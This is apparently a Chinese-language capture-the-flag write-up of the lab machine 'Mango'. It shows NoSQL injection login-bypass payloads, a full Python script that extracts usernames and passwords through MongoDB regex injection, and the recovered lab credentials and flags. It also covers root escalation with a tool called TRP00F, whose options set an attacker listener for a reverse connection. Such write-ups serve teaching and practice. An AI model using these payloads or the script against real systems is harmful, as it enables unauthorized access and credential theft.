MongoDB注入与权限提升技术详解

信息收集阶段

初始扫描

目标IP: 10.10.10.162
开放端口:

• 22/tcp (SSH) - OpenSSH 7.6p1 Ubuntu
• 80/tcp (HTTP) - Apache httpd 2.4.29
• 443/tcp (HTTPS) - Apache httpd 2.4.29

主机名配置

echo '10.10.10.162 mango.htb staging-order.mango.htb' >> /etc/hosts

MongoDB注入攻击

注入原理

目标网站使用PHP与MongoDB交互，存在NoSQL注入漏洞。MongoDB使用特殊操作符如$ne(不等于)和$regex(正则匹配)进行查询。

认证绕过技术

1. 基本绕过:

   POST / HTTP/1.1
   username=admin&password[$ne]=admin&login=login
   

   等价于MongoDB查询:

   db.users.find({ username: "admin", password: {$ne:"admin"} });
   

2. 正则表达式注入:

   POST / HTTP/1.1
   username[$regex]=a.*&password[$ne]=admin&login=login
   

   等价于MongoDB查询:

   db.users.find({username: { $regex: "a.*" }, password: { $ne: "admin" }});
   

自动化注入脚本

完整Python脚本(exp.py):

import re
from requests import post
from string import ascii_lowercase, ascii_uppercase, digits, punctuation

url = 'http://staging-order.mango.htb/'

class Colors:
    HEADER = '\033[95m'
    OKBLUE = '\033[94m'
    OKGREEN = '\033[92m'
    WARNING = '\033[93m'
    FAIL = '\033[91m'
    ENDC = '\033[0m'
    BOLD = '\033[1m'
    UNDERLINE = '\033[4m'

def get_characters():
    """识别可能的用户名和密码字符"""
    charset = ascii_lowercase + ascii_uppercase + digits
    found_chars = []
    for char in charset:
        response = post(url, data={
            'username[$regex]': f'^{char}.*',
            'password[$ne]': 'password',
            'login': 'login'
        }, allow_redirects=False)
        if response.status_code == 302:
            found_chars.append(char)
            print(f"{Colors.OKGREEN}[+] Found character: {char}{Colors.ENDC}")
    return found_chars

def build_usernames(chars):
    """从识别出的字符构建用户名"""
    print(f"{Colors.WARNING}[*] Building usernames...{Colors.ENDC}")
    charset = ascii_lowercase + ascii_uppercase + digits
    usernames = []
    for char in chars:
        username = char
        while True:
            found_char = False
            for next_char in charset:
                regex = f'^{username + next_char}.*'
                response = post(url, data={
                    'username[$regex]': regex,
                    'password[$ne]': 'password',
                    'login': 'login'
                }, allow_redirects=False)
                if response.status_code == 302:
                    username += next_char
                    found_char = True
                    print(f"{Colors.OKGREEN}[+] Found character '{next_char}' for username: {username}{Colors.ENDC}")
                    break
            if not found_char:
                break
        usernames.append(username)
        print(f"{Colors.OKGREEN}[+] Found username: {username}{Colors.ENDC}")
    return usernames

def escape_special_characters(s):
    """转义字符串中的特殊字符用于正则表达式"""
    return re.escape(s)

def find_passwords(usernames):
    """尝试为每个识别出的用户名找到密码"""
    print(f"{Colors.WARNING}[*] Finding passwords for users...{Colors.ENDC}")
    charset = ascii_lowercase + ascii_uppercase + digits + punctuation
    results = []
    for user in usernames:
        password = ''
        while True:
            found_char = False
            for char in charset:
                escaped_password = escape_special_characters(password + char)
                response = post(url, data={
                    'username': user,
                    'password[$regex]': f'^{escaped_password}.*',
                    'login': 'login'
                }, allow_redirects=False)
                if response.status_code == 302:
                    password += char
                    found_char = True
                    print(f"{Colors.OKGREEN}[+] Found character '{char}' for password: {password}{Colors.ENDC}")
                    break
            if not found_char:
                break
        results.append((user, password))
        print(f"{Colors.OKGREEN}[+] Password found for user {user}: {password}{Colors.ENDC}")
    return results

def print_results(results):
    """以表格格式打印结果"""
    print(f"{Colors.HEADER}\n[+] Final results:{Colors.ENDC}")
    print(f"{Colors.BOLD}{'Username':<20} {'Password':<20}{Colors.ENDC}")
    print(f"{'='*40}")
    for user, password in results:
        print(f"{user:<20} {password:<20}")

if __name__ == '__main__':
    chars = get_characters()
    usernames = build_usernames(chars)
    results = find_passwords(usernames)
    print_results(results)

执行结果

Username            Password
========================================
admin               t9KcS3>!0B#2
mango               h3mXK8RhU~f{]f5H

初始访问

使用获取的凭据通过SSH登录:

ssh mango@mango.htb
# 密码: h3mXK8RhU~f{]f5H

su admin
# 密码: t9KcS3>!0B#2

获取user flag:

6fcde02686f818d7a13592d510c4867f

权限提升技术

方法一: JJS权限提升

使用TRP00F工具进行jjs漏洞利用:

python3 trp00f.py --lhost 10.10.16.24 --lport 10011 --rhost 10.10.16.24 --rport 10035 --http 9999

选择jjs漏洞利用选项:

[!] Do you want to exploit the vulnerability in file jjs? (y/n) >y
[!] Do you want to exploit the vulnerability in file 'pkexec' ? (y/n) >n

方法二: pkexec权限提升

同样使用TRP00F工具:

python3 trp00f.py --lhost 10.10.16.24 --lport 10011 --rhost 10.10.16.24 --rport 10035 --http 9999

选择pkexec漏洞利用选项:

[!] Do you want to exploit the vulnerability in file jjs? (y/n) >n
[!] Do you want to exploit the vulnerability in file 'pkexec' ? (y/n) >y

获取root flag:

110c3bcc1eb4a29e3da9c2e1d372c50d

关键点总结

1. MongoDB注入:

   • 使用$ne操作符绕过认证
   • 使用$regex操作符进行数据枚举
   • PHP数组语法(param[]=value)传递MongoDB操作符

2. 自动化注入:

   • 分阶段枚举字符
   • 使用正则表达式逐步构建完整凭据
   • 处理特殊字符转义

3. 权限提升:

   • 多路径提权(jjs和pkexec)
   • 使用自动化工具TRP00F简化过程
   • 灵活选择最适合目标系统的提权方法

4. 工具使用:

   • TRP00F工具提供多种提权选项
   • 可配置监听端口和HTTP服务
   • 交互式选择漏洞利用方式